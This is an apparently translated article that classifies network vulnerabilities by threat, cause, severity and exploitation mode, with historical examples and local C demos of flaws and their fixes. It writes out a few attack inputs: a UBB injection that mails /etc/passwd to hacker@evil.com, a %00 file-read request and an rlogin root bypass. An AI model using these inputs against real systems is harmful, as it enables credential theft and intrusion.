The purpose of this article is to summarize some of my thinking on the main problem encountered when building a vulnerability database: how to classify computer network vulnerabilities. Some of the ideas here are not mature, and with some of them I am not satisfied myself; they are offered so that colleagues with in-depth research in this area can discuss them and we can improve the work together.
A computer network security vulnerability has many attributes. I think they can be summarized under the following aspects: the direct threat the vulnerability poses, the cause of the vulnerability, the severity of the vulnerability, and the way the vulnerability is exploited. The following sections describe vulnerability categories along each of these axes.
A. Direct threats to the system caused by vulnerabilities
These can be roughly divided into the following categories. Note that the security threat posed by a vulnerability is far from limited to its direct consequence: if an attacker gains ordinary-user access to a system, it is very likely that he can then use a local vulnerability to elevate himself to administrator privileges.
1. Remote administrator privileges
The attacker obtains administrator privileges on the remote system directly, without needing an account to log on to the machine. Typically the attack is carried out against a defective system daemon running as root. Most of these vulnerabilities are buffer overflows; a few are logic defects in the daemon.
Typical vulnerabilities:
The imapd daemon of IMAP4rev1 v10.190 does not check the length of the parameter it reads for the AUTHENTICATE command. A carefully constructed AUTHENTICATE command string overflows imapd's buffer and runs a command of the attacker's choosing; because imapd runs as root, this directly yields root on the machine.
An ISAPI DLL of Windows NT IIS 4.0 does not perform proper boundary checks on the input URL. By constructing an overlong URL, an attacker can overflow a buffer in IIS (inetinfo.exe) and execute code of his choosing. Since inetinfo.exe runs as the local system account, the overflow directly yields Administrator privileges.
Early versions of the AIX 3.2 rlogind code have a defect in their authentication logic. With rlogin victim.com -l -froot an attacker can log on to the system as root without supplying a password.
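As an added illustration (not code from the article, from imapd or from any of the products named above), the following C fragment shows the input validation error behind this whole category: a daemon copying a client-supplied argument into a fixed-size buffer without checking its length, beside the bounded version that refuses overlong input. The session record, its 20-byte layout and the function names are assumptions made for the demo; it runs locally and touches no network.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical session record of a network daemon (an assumption for this
 * demo, not the layout of the real imapd). The flag that decides whether the
 * session is privileged sits right after the fixed-size command buffer, which
 * is what makes an overflow of the buffer immediately useful to an attacker. */
struct session {
    char cmd[16];          /* one command argument, as read from the client */
    unsigned int is_admin; /* overwritten by whatever spills out of cmd */
};

/* VULNERABLE: copies the client-supplied argument until its terminator and
 * never consults the size of the destination. This is the shape of the imapd
 * AUTHENTICATE bug: the length of the parameter is simply not checked.
 * (A byte loop rather than strcpy, so the compiler's fortified strcpy does
 * not stop the demo before it shows the effect.) */
size_t copy_arg_unbounded(char *dst, const char *src)
{
    size_t i = 0;
    while (src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

/* HARDENED: the caller states how big the destination is, and an argument
 * that does not fit (terminator included) is rejected rather than truncated,
 * so the daemon never acts on a silently mangled command. */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > dstsz)
        return -1;         /* too long: refuse it */
    memcpy(dst, src, n + 1);
    return (int)n;
}

/* Feeds the same overlong argument to both versions.
 * Returns a bit mask: bit 0 = the unbounded copy flipped is_admin,
 * bit 1 = the bounded copy refused the argument and left is_admin alone.
 * Returns -1 if the struct layout differs from the 20 bytes this demo assumes. */
int demo_overflow(void)
{
    char evil[20];
    struct session s;
    int result = 0;

    if (sizeof(struct session) != 20)
        return -1;
    memset(evil, 'A', 19);  /* 16 bytes fill cmd, 3 more land in is_admin */
    evil[19] = '\0';        /* the terminator is the 20th and last byte of s */

    memset(&s, 0, sizeof s);
    copy_arg_unbounded(s.cmd, evil);
    if (s.is_admin != 0)
        result |= 1;

    memset(&s, 0, sizeof s);
    if (copy_arg_bounded(s.cmd, sizeof s.cmd, evil) == -1 && s.is_admin == 0)
        result |= 2;

    return result;
}

int main(void)
{
    printf("demo_overflow() = %d (3 means: overflow flipped the flag, bounded copy refused)\n",
           demo_overflow());
    return 0;
}
```

The overflow here stays inside the struct on purpose so the program does not crash; in a real daemon the same missing check lets the attacker write past the end of the stack frame and redirect execution, which is how the imapd and IIS cases above yield root or Administrator.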
2. Local administrator privileges
An attacker who already has a local account can obtain system administrator privileges by attacking defective local suid programs or by exploiting race conditions.
Typical vulnerabilities:
RedHat Linux's restore is a suid program whose execution relies on the RSH environment variable. By setting the RSH and PATH environment variables, an attacker can have an executable of his choosing run as root, obtaining root privileges on the system.
The Xsun program of Solaris 7 is suid root and does not perform a valid boundary check on its input parameters. Its buffer can easily be overflowed to run attacker-specified code as root, yielding administrator privileges.
On Windows, attackers have the opportunity to make the Network DDE agent (Network DDE is a technology that dynamically shares data between applications on different Windows machines) execute specified code in the security context of the local system account, thereby elevating their privileges and taking full control of the local machine.
3. Ordinary user access
This kind of access lets the attacker execute programs and access files as an ordinary user. Attackers usually obtain it by attacking a daemon running as a non-root user, or by means of defective CGI programs.
Typical vulnerabilities:
UBB is a forum program widely used on a variety of UNIX and Windows systems and implemented in Perl. Versions earlier than 5.19 have an input validation problem: by submitting carefully crafted form content, an attacker can make UBB execute shell commands. Since a web server generally runs as nobody, this yields a shell as nobody. For example, by submitting the data topic='192.ubb|mail hacker@evil.com </etc/passwd|' we obtain the system's passwd file.
The innd 2.2.2.3 news server shipped with RedHat Linux 6.2 has a buffer overflow vulnerability. Using a specially crafted news article, an attacker can make innd run specified code as the news user, obtaining a shell with innd's privileges.
Windows IIS 4.0 and 5.0 have the Unicode directory traversal vulnerability: using alternative UTF-8 encodings of the characters in ../, attackers can escape the web root and run cmd.exe and other programs on the system with the privileges of the anonymous web account, which is a member of the Guests group. This is equivalent to obtaining ordinary user privileges.
4. Privilege escalation
Attackers attack defective local sgid programs to escalate their privileges to those of another non-root user or group. Obtaining administrator privileges can be seen as a special case of privilege escalation, but it is treated as a separate threat above.
Typical vulnerabilities:
The man program in RedHat Linux 6.1 is sgid man and has a format string bug. By exploiting it, attackers can obtain the privileges of the man group.
The write program of Solaris 7 is sgid tty and has a buffer overflow. By attacking it, attackers can obtain the privileges of the tty group.
On Windows NT, attackers can plant a specially crafted profile for other users of the system, so that those users, sometimes including administrators, execute malicious code.
5. Reading restricted files
Attackers exploit certain vulnerabilities to read files in the system that they are not permitted to read. These files are usually security-related. Such vulnerabilities may be caused by incorrect file permissions, incorrect handling of files by privileged processes, or an accidental core dump that writes part of a restricted file into a world-readable core file.
Typical vulnerabilities:
The ftpd of SunOS 5.5 has a vulnerability: an ordinary user can cause ftpd to fail and dump a world-readable core file containing a segment of the shadow file, so that the ordinary user can read part of the shadow contents.
The suid program pg of SuSE 6.2 has problems in how it handles its configuration file. By linking pb.conf to a privileged file, pb can be used to read the content of that file.
The log file of Oracle 8.0.3 Enterprise Edition for NT 4.0 is world-readable and in plaintext. It records connection passwords and may be read by attackers.
6. Remote denial of service
Attackers can exploit such vulnerabilities to launch a denial of service attack on the system without logging on, causing the system or an application to crash or stop responding. These vulnerabilities are usually caused by defects or incorrect settings in the system or its daemons.
Typical vulnerabilities:
In earlier versions of Linux and BSD, the IP fragment reassembly module of the TCP/IP stack has defects. By sending specially crafted IP fragments to the system, an attacker can crash the machine.
NetMeeting 3.01 on Windows 2000 has a defect: by sending it a binary data stream, an attacker can drive the CPU usage of the server to 100%.
AnalogX Proxy Server 4.04 can be crashed by sending a USER command with an overlong parameter to its FTP port.
7. Local denial of service
Attackers can exploit such vulnerabilities after logging on to the system to crash the system or an application. They are mainly caused by program errors in handling unexpected situations, such as not checking whether a file already exists before writing a temporary file, or blindly following a symbolic link.
Typical vulnerabilities:
BSDi 3.x has a vulnerability that allows a local user to overwrite arbitrary system files with junk data, easily rendering the system unusable.
The tmpwatch program of RedHat 6.1 has a defect that can make it call fork() an enormous number of times, creating so many processes that the system stops responding.
8. Remote unauthorized file access
By exploiting these vulnerabilities, attackers can remotely access certain system files without authorization. They are mainly caused by defective CGI programs that do not properly check the legality of user input, so that attackers can access files by constructing special input.
Typical vulnerabilities:
Poll_It_SSI_v2.0.cgi has a vulnerability that lets attackers read any file the web server has permission to read, including files outside the web directory. Sending the following request to the server displays the /etc/passwd file: http://www.targethost.com/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 (the trailing %00 is a NUL byte that truncates the file name the script appends to the parameter).
Windows IIS 5.0 has a vulnerability: by sending a request with a special header (Translate: f), an attacker can obtain the source code of an ASP page instead of the output of executing it.
Windows IE has many vulnerabilities that allow a malicious web page to read and browse the user's local files.
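The Poll_It case above shows two input checks a CGI program has to make before opening a user-named file: that the decoded value contains no NUL byte (which truncates the path in the C library, and in Perl's open), and that the file it resolves to still lies inside the intended data directory. The following C example is an addition to the article, not code from Poll_It or any product it names; it implements both checks against a throwaway directory built on the spot, and the function names, the directory layout and the sample query strings are assumptions made for the demo.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <ctype.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Percent-decodes a query parameter into out and returns the number of bytes
 * written. That count can differ from strlen(out) when the input contained
 * %00, and that difference is exactly what the data_dir=/etc/passwd%00
 * attack relies on: everything after the NUL is invisible to open(). */
size_t url_decode(const char *in, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0' && n + 1 < outsz; i++) {
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1])
            && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[n++] = (unsigned char)strtoul(hex, NULL, 16);
            i += 2;
        } else if (in[i] == '+') {
            out[n++] = ' ';
        } else {
            out[n++] = (unsigned char)in[i];
        }
    }
    out[n] = '\0';
    return n;
}

/* Resolves a user-supplied relative name inside base and returns 0 only if
 * the canonical result is still inside base. Rejects an embedded NUL (by
 * comparing against the decoded length, not strlen), absolute names, and
 * anything whose realpath() escapes base, which covers ".." and symlinks.
 * realpath() needs the target to exist; for a data file the script is about
 * to read, that is the case. */
int resolve_inside(const char *base, const unsigned char *name, size_t namelen,
                   char *out, size_t outsz)
{
    char basereal[PATH_MAX], joined[PATH_MAX], real[PATH_MAX];
    if (memchr(name, '\0', namelen) != NULL) return -1;   /* %00 truncation */
    if (namelen == 0 || name[0] == '/') return -1;        /* absolute path */
    if (realpath(base, basereal) == NULL) return -1;
    if (snprintf(joined, sizeof joined, "%s/%.*s", basereal,
                 (int)namelen, (const char *)name) >= (int)sizeof joined)
        return -1;
    if (realpath(joined, real) == NULL) return -1;
    size_t blen = strlen(basereal);
    if (strncmp(real, basereal, blen) != 0 || real[blen] != '/') return -1;
    if (strlen(real) + 1 > outsz) return -1;
    strcpy(out, real);
    return 0;
}

/* Constructed scenario: <tmp>/data/poll.dat is the legitimate file and
 * <tmp>/secret stands in for /etc/passwd. Returns a bit mask:
 * bit 0 = "poll.dat" resolves, bit 1 = "..%2Fsecret" is rejected,
 * bit 2 = "poll.dat%00.html" is rejected even though strlen() alone would
 * make it look like plain "poll.dat". -1 if setup fails. */
int demo_cgi_path_check(void)
{
    char dir[] = "/tmp/vulnclass-XXXXXX";
    char data[PATH_MAX], secret[PATH_MAX], pollfile[PATH_MAX], out[PATH_MAX];
    unsigned char dec[256];
    int result = 0, fd;
    size_t n;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(data, sizeof data, "%s/data", dir);
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(pollfile, sizeof pollfile, "%s/data/poll.dat", dir);
    if (mkdir(data, 0700) != 0) return -1;
    if ((fd = open(secret, O_WRONLY | O_CREAT, 0600)) < 0) return -1;
    close(fd);
    if ((fd = open(pollfile, O_WRONLY | O_CREAT, 0600)) < 0) return -1;
    close(fd);

    n = url_decode("poll.dat", dec, sizeof dec);
    if (resolve_inside(data, dec, n, out, sizeof out) == 0
        && strcmp(out + strlen(out) - 8, "poll.dat") == 0)
        result |= 1;

    n = url_decode("..%2Fsecret", dec, sizeof dec);
    if (resolve_inside(data, dec, n, out, sizeof out) == -1)
        result |= 2;

    n = url_decode("poll.dat%00.html", dec, sizeof dec);
    if (strlen((char *)dec) == 8 && n == 14
        && resolve_inside(data, dec, n, out, sizeof out) == -1)
        result |= 4;

    unlink(pollfile); unlink(secret); rmdir(data); rmdir(dir);
    return result;
}

int main(void)
{
    printf("demo_cgi_path_check() = %d (7 means all three checks behaved)\n",
           demo_cgi_path_check());
    return 0;
}
```

The important design point is that the length of the decoded value is carried separately from the bytes: any check that calls strlen() on the decoded parameter has already lost the part after %00 and will approve the truncated name.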
9. Password recovery
Because of a weak password encryption method, an attacker can easily analyze and reverse the encryption algorithm; having obtained the encrypted password by some means, he can then recover the plaintext.
Typical vulnerabilities:
PassWD v1.2 on Windows is used to manage the various passwords on a system and store them together with their URLs. However, the method used to encrypt the stored passwords is very weak; after simple analysis, the plaintext can be recovered from the encrypted password.
pcAnywhere 9.0 uses a very weak method to encrypt passwords in transit. Anyone who can capture the transmitted data can easily decode the plaintext password.
Browsegate is a proxy firewall for Windows. Version 2.80.2 stores the encrypted password in a configuration file that is readable by all users, and the encryption method is extremely weak, so the plaintext can easily be decoded.
10. Spoofing
Attackers can exploit such vulnerabilities to deceive the target system or its users. This is usually because of defects in the system's implementation.
Typical vulnerabilities:
Windows IE has a vulnerability that allows a malicious website to insert content into a window belonging to another website, thereby deceiving users into entering sensitive data.
The TCP/IP stack of Linux kernel 2.0.35 has a vulnerability that makes IP address spoofing easy for attackers.
11. Server information leakage
Attackers can exploit these vulnerabilities to collect information useful for further attacks. This type of vulnerability mainly arises because a system program has a defect and handles an abnormal condition incorrectly.
Typical vulnerabilities:
Windows IIS 3.0 through 5.0 have a vulnerability: when a request is made for a nonexistent .ida or .idq file, the server may return an error message that exposes the IIS installation directory. For example, a request for http://www.microsoft.com/anything.ida returns the response: The IDQ file d:\http\anything.ida could not be found. Such leaks are convenient for attackers; for example, the widely used msadc attack requires knowledge of the system installation directory.
In the TCP/IP stack of Linux kernels below 2.1.53, open and closed ports respond differently to certain packets. Attackers can use this to perform stealth port scans.
Some CGI programs such as DBMan (db.cgi) have vulnerabilities that allow attackers to see some of the server's environment variables and so obtain useful information about the system.
12. Others
Although the above categories cover the vast majority of vulnerabilities, there may still be some that cannot be described by any of them.
B. Classification by the cause of the vulnerability
Classifying vulnerabilities by cause is another headache, because vulnerability research at different levels of abstraction classifies the same vulnerability differently. Take the ps race condition described below: at the lowest level it is a parameter validation error, because successive system calls do not check that they are operating on the same object; at a higher level it is a synchronization or race condition error; at a higher level still it is a logic error, because the object may be removed while in use. So far we have not seen a perfect classification scheme; even the categories on securityfocus are unsatisfactory. Causes are roughly divided into the following categories:
Input validation error
Most buffer overflow and CGI vulnerabilities are caused by the absence of proper checks on the legitimacy of user-supplied input data.
Access validation error
The vulnerability is caused by a logic error in the access validation part of the program that makes it possible to bypass the access control. The AIX rlogin vulnerability mentioned above is typical.
Race conditions
The vulnerability lies in the timing and synchronization of the program's handling of objects such as files; this leaves a window of opportunity in which an attacker can exert external influence. The ps command of earlier Solaris systems has a vulnerability of this type. During execution, ps creates a temporary file in /tmp named after its pid, then chowns it to root and renames it to ps_data. If an attacker can create the temporary file while ps is running and make it point to a file of interest, then after ps finishes the attacker can make arbitrary modifications to that root-owned file, which leads to root privileges.
Exceptional condition handling error
The vulnerability arises because the program's implementation logic fails to take into account some unexpected situations that should have been considered. Most of the vulnerabilities that blindly follow symbolic links in the /tmp directory and overwrite files belong to this type. Example: /etc/sysadm.d/bin/userOsa on SCO UNIX OpenServer blindly overwrites a debugging log file with a fixed name; by pointing that name at a privileged file, an attacker can completely compromise the system.
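Both the ps race condition and the userOsa case come down to a privileged program opening a name in a world-writable directory that an attacker may already control. The following C example is an addition to the article (not code from Solaris, SCO or any product it names); it plants a symlink at a predictable log name and runs a blind writer and a hardened writer against it, so the difference between the two open() calls can be seen on a real file system. The function names, the /tmp scratch directory and the "victim" file are assumptions made for the demo.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* VULNERABLE: a privileged program writes its debug log at a fixed,
 * predictable name and simply opens that name for writing. If an attacker
 * planted a symlink there first, open() follows it and the privileged
 * process truncates and overwrites whatever the link points at. */
int write_log_blindly(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* HARDENED: never follow a symlink, and insist on creating the file
 * ourselves (O_EXCL) so anything pre-planted at that name makes the open
 * fail with EEXIST or ELOOP instead of being silently used. */
int write_log_safely(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* 1 if the file holds exactly expect, 0 if not, -1 on error. */
static int file_equals(const char *path, const char *expect)
{
    char buf[256];
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return strcmp(buf, expect) == 0;
}

/* Constructed scenario: a throwaway directory holding "victim" (standing in
 * for a privileged file) and an attacker-planted symlink debug.log -> victim.
 * Returns a bit mask: bit 0 = the blind writer overwrote victim through the
 * link, bit 1 = the safe writer refused the link and victim is intact.
 * Returns -1 if the setup itself fails. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/vulnclass-XXXXXX";
    char victim[PATH_MAX], link_[PATH_MAX];
    int result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link_, sizeof link_, "%s/debug.log", dir);

    if (write_log_safely(victim, "original") != 0 || symlink(victim, link_) != 0)
        return -1;

    /* the vulnerable program runs and victim's content is replaced */
    if (write_log_blindly(link_, "junk") == 0 && file_equals(victim, "junk") == 1)
        result |= 1;

    /* restore victim (writing to the real path), then try the hardened writer */
    write_log_blindly(victim, "original");
    errno = 0;
    if (write_log_safely(link_, "junk") == -1 && (errno == EEXIST || errno == ELOOP)
        && file_equals(victim, "original") == 1)
        result |= 2;

    unlink(link_);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("demo_symlink_attack() = %d (3 means: blind write hit victim, safe write refused)\n",
           demo_symlink_attack());
    return 0;
}
```

O_EXCL closes the window the ps race depends on as well: the privileged program either creates the file itself in one step or fails, so there is no moment between "create" and "chown" in which an attacker-controlled name can be substituted. For genuinely temporary files, mkstemp() applies the same flags with an unpredictable name.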
Design error
This category is very general; strictly speaking, most vulnerabilities are design errors. Therefore, vulnerabilities that cannot be placed in any other category are put here for now.
Configuration error
The vulnerability is caused by incorrect system or application configuration: software installation errors, incorrect configuration parameters, or incorrect access permissions.
Environment error
Vulnerabilities caused by environment variables being wrong or maliciously set. For example, an attacker may cause a program of his choosing to be executed by resetting the shell's internal field separator IFS, shell escape characters, or other environment variables. The RedHat Linux restore vulnerability mentioned above is of this type.
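A setuid program should not trust the environment it inherits at all; the usual fix is to discard it and rebuild a minimal one with PATH and IFS pinned before running any helper. The following C example is an addition to the article (not code from restore or any other program it names); it builds such an environment from a constructed hostile one of the kind the restore attack relies on. The whitelist of variables and the function names are assumptions made for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ENV 32

/* Variables a privileged helper is allowed to inherit. Anything that steers
 * how a program or shell finds and parses commands (PATH, IFS, RSH, LD_*,
 * ENV, BASH_ENV, ...) is deliberately absent. This list is an assumption of
 * the demo, not a rule from the article. */
static const char *const allowed[] = { "TERM", "LANG", "TZ", "DISPLAY", NULL };

/* 1 if the NAME part of a "NAME=value" entry is on the whitelist. */
static int name_allowed(const char *entry)
{
    size_t namelen = strcspn(entry, "=");
    for (int i = 0; allowed[i] != NULL; i++)
        if (strlen(allowed[i]) == namelen && strncmp(allowed[i], entry, namelen) == 0)
            return 1;
    return 0;
}

/* Builds a fresh environment for a setuid program from the caller-supplied
 * one: whitelisted variables are copied, everything else is dropped, and
 * PATH and IFS are pinned to known-good values regardless of what came in.
 * Returns the number of entries written, or -1 if out is too small. */
int build_privileged_env(char *const *envp, const char **out, size_t outmax)
{
    size_t n = 0;
    if (outmax < 3)
        return -1;
    out[n++] = "PATH=/usr/bin:/bin";
    out[n++] = "IFS= \t\n";
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (!name_allowed(envp[i]))
            continue;                 /* RSH, PATH, LD_PRELOAD, ... dropped */
        if (n + 1 >= outmax)
            return -1;
        out[n++] = envp[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* Looks up name in a NULL-terminated "NAME=value" array; value or NULL. */
const char *env_lookup(const char **env, const char *name)
{
    size_t len = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=')
            return env[i] + len + 1;
    return NULL;
}

/* Constructed hostile environment of the kind the restore attack relies on.
 * Returns 1 if the hostile variables are gone and the pinned ones are in
 * place, 0 otherwise. */
int demo_env_sanitize(void)
{
    char *const hostile[] = {
        "PATH=/tmp/evil:/usr/bin:/bin",
        "RSH=/tmp/evil/rsh",
        "IFS=/",
        "LD_PRELOAD=/tmp/evil/lib.so",
        "TERM=xterm",
        NULL
    };
    const char *clean[MAX_ENV];

    if (build_privileged_env(hostile, clean, MAX_ENV) < 0)
        return 0;
    return env_lookup(clean, "RSH") == NULL
        && env_lookup(clean, "LD_PRELOAD") == NULL
        && strcmp(env_lookup(clean, "PATH"), "/usr/bin:/bin") == 0
        && strcmp(env_lookup(clean, "IFS"), " \t\n") == 0
        && strcmp(env_lookup(clean, "TERM"), "xterm") == 0;
}

int main(void)
{
    printf("demo_env_sanitize() = %d (1 means the hostile variables were removed)\n",
           demo_env_sanitize());
    return 0;
}
```

The resulting array is what the program passes as the envp argument of execve() when it runs its helper; it should also invoke the helper by absolute path rather than relying on the pinned PATH, and should never hand a user-controlled variable such as RSH to system() or a shell.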
There is a certain relationship between a vulnerability's threat type and its error type. The original figure (not reproduced here) draws a straight line between each threat type and the error types directly related to it. The threat types on one side are:
Remote administrator privileges
Local administrator privileges
Ordinary user access
Privilege escalation
Reading restricted files
Remote denial of service
Local denial of service
Remote unauthorized file access
Password recovery
Spoofing
Server information leakage
and the error types on the other side are:
Input validation error
Access validation error
Race conditions
Exceptional condition handling error
Design error
Configuration error
Environment error
From the figure it can be seen that input validation errors are related to almost all threat types; design errors and configuration errors also lead to many threats.
C. Classification by vulnerability severity
In general, the threat type of a vulnerability largely determines its severity. We divide severity into three levels: high, medium, and low. Remote and local administrator privileges are generally high; ordinary user access, privilege escalation, reading restricted files, and remote and local denial of service are generally medium; remote unauthorized file access, password recovery, spoofing, and server information leakage generally correspond to low. This is only the most common case, however, and in practice the specific situation must be analyzed. For example, a remote denial of service vulnerability in a popular operating system itself should be rated high, and a weak password scheme or password recovery vulnerability in widely used software should also be rated medium or high.
D. Classification by vulnerability exploitation method
The existence of a vulnerability is an objective fact, but it can only be exploited in a certain way: each vulnerability requires the attacker to be in a particular position in the network. The possible attack modes fall into the following four categories:
Physical contact
Attackers need physical access to the target system to exploit such vulnerabilities and threaten its security. (Figure: attacker with physical access to the host.)
Host mode
This is the common exploitation mode: the attacker acts as a client against the target host. For example, if an attacker finds that a daemon on the target host has a remote overflow vulnerability, the attacker may gain additional access to the host.
(Figure: attacker attacking the host over the network.)
Client mode
When a user accesses a host on the network, the user's client may be attacked by malicious content sent from that host; the client should not over-trust the host. For example, the web browser IE has many vulnerabilities that allow a malicious website to use HTML tags to execute programs or read and write files on the client that browses it.
(Figure: host attacking the client.)
Man-in-the-middle mode
When an attacker is positioned where he can observe or intercept the communication between two machines, he is a man in the middle. In many cases valuable information is transmitted between hosts in plaintext, so the attacker can easily attack the other hosts. Even against some implementations of public key cryptography, the attacker can intercept and replace the keys, posing as the other node to each of the two communicating nodes, and so bypass this protection.
(Figure: attacker listening to or tampering with the communication between the two hosts.)
This article gives a rough classification of network security vulnerabilities. It is far from a perfect solution; if you are interested, please feel free to contact us.
Some of the references I have read:
http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html
http://www.securityfocus.com/data/library/compvuln_draft.pdf
Of course, there is also:
http://www.xfocus.org/html/query_exploit.html
where all the vulnerability examples mentioned in this article can be found.